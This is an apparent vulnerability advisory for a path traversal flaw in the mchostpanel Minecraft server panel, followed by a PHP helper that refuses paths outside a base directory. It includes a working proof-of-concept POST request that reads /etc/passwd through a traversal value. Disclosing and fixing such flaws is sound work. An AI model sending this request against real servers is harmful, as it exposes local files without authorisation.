Path Traversal in alanaktion/mchostpanel
Sep 5th 2021
A path traversal vulnerability was identified in this Minecraft server control panel. It allows an attacker to access arbitrary user resources.
🕵️♂️ Proof of Concept
POST /ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

req=file_get&file=..%2F..%2F..%2Fetc%2Fpasswd
This issue may lead to unauthorized access to local files (information disclosure).
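A containment check of the kind that refuses the `file` value in the request above, written as an added PHP example. It is not mchostpanel's code: the helper name `resolve_inside`, the directory layout and the sample files are assumptions constructed for the demo.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a user-supplied relative path inside $baseDir.
 * Returns the canonical absolute path, or null if the request must be refused.
 * (Hypothetical helper; name and signature are assumptions.)
 */
function resolve_inside(string $baseDir, string $userPath): ?string
{
    // Reject empty names and NUL bytes before touching the filesystem.
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; false means the target does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare with a trailing separator so "server1-backup" does not pass for base "server1".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a throwaway server directory with one config file,
// plus a sibling directory whose name shares the base prefix.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pt_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/server1', 0700, true);
mkdir($root . '/server1-backup', 0700, true);
file_put_contents($root . '/server1/server.properties', "motd=demo\n");
file_put_contents($root . '/server1-backup/secret.txt', "x\n");

$cases = [
    'server.properties',              // legitimate request: ok
    '../../../etc/passwd',            // decoded value from the request above: refused
    '../server1-backup/secret.txt',   // sibling with a shared name prefix: refused
    './../server1/server.properties', // leaves and re-enters; canonical path is inside: ok
];
foreach ($cases as $file) {
    $path = resolve_inside($root . '/server1', $file);
    printf("%-34s => %s\n", $file, $path === null ? 'REFUSED' : 'ok');
}
```

The check runs on the canonical path rather than on the raw string, so encoded or nested `../` sequences and symlinks pointing outside the base directory are refused by the same comparison.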